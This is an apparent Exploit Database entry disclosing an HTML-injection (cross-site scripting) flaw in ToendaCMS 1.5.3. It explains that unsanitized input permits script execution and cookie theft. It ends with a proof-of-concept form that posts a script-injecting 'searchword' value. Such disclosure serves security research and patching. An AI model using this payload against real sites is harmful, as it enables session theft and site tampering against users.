ToendaCMS 1.5.3 - GET / POST Forms HTML Injection

EDB-ID:

29849




Platform:

PHP

Date:

2007-04-12


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

source: https://www.securityfocus.com/bid/23453/info

ToendaCMS is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input.

Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

This issue affects ToendaCMS 1.5.3; other versions may also be affected. 

<form action="http://toendainstallation/" method="post">
 <input type="hidden" name="searchword" value='"><script>alert(1)</script>'>
 <input type="hidden" name="id" value="search">
 <input type="submit"></form>